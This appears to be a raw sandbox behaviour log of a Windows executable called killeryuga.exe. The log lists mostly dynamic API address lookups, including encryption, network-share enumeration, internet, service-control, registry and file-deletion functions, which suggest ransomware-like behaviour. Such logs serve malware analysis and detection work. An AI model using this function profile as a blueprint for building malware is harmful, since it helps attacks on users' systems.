Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x753879f9 True 1
Fn
System Get Info type = Hardware Information True 249
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x75363519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = RPCRT4.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringA, address_out = 0x75a2d918 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringW, address_out = 0x759f1ee5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeW, address_out = 0x759d1635 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreate, address_out = 0x759cf48b True 1
Fn
Module Load module_name = MPR.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetEnumResourceW, address_out = 0x750d3058 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetOpenEnumW, address_out = 0x750d2f06 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetCloseEnum, address_out = 0x750d2dd6 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75d30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x75d59197 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75d4b406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75d5f18e True 1
Fn
Module Load module_name = WINMM.dll, base_address = 0x75090000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x750926e0 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x77020000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x770345bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7705ad1a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendA, address_out = 0x7702d65e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x770381ef True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75364435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75365a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7536103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x7537c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75364259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75361136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75365371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75361986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x7536492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x7538830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x75364620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x7538d556 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x75361072 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75363ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75363f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x75382b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75365929 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x7538594d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x753659e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x75379af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75388baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x7536168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x7536183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7538896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x7538828e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x75364c6b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x753689b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75362d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x75383102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x75365444 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x75382a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x7537cf28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x7537174d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x75365558 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x75364467 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x753634d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x7538d526 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x7536495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x753834d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x7537f481 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x753614e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x753654ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x7536dd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75488a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75489a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x754878e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x75489abb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x754888f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x75491361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75487809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x7548b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75490dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsWindow, address_out = 0x75487136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75489679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75493559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x776025dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x754dfd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x754905ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x754dfd3f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x7548787b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x76f6369c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x76f6157a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x76f5df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x76f614d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x76f6469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x76f77144 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceW, address_out = 0x76f5ca4c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x76f5df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x76f7779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x76f5c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x76f646ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76077078 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x75beb636 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75c186d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75c19d0b True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x76b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b53eae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 8, address_out = 0x76b53ed5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 12, address_out = 0x76b55dee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 201, address_out = 0x76b54af8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 6, address_out = 0x76b53e59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x76b53f21 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 2, address_out = 0x76b54642 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 202, address_out = 0x76b5fd6b True 1
Fn
Module Load module_name = IPHLPAPI.DLL, base_address = 0x750f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x750f9263 True 1
Fn
Module Load module_name = WS2_32.dll, base_address = 0x76b10000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x76b1311b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x76b27673 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x76b1b131 True 1
Fn
Module Load module_name = DNSAPI.dll, base_address = 0x75020000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x7502436b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_W, address_out = 0x7503572c True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x751a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x74e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x74e9c544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 05:39:08 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 15114094153 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x753e410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Fn
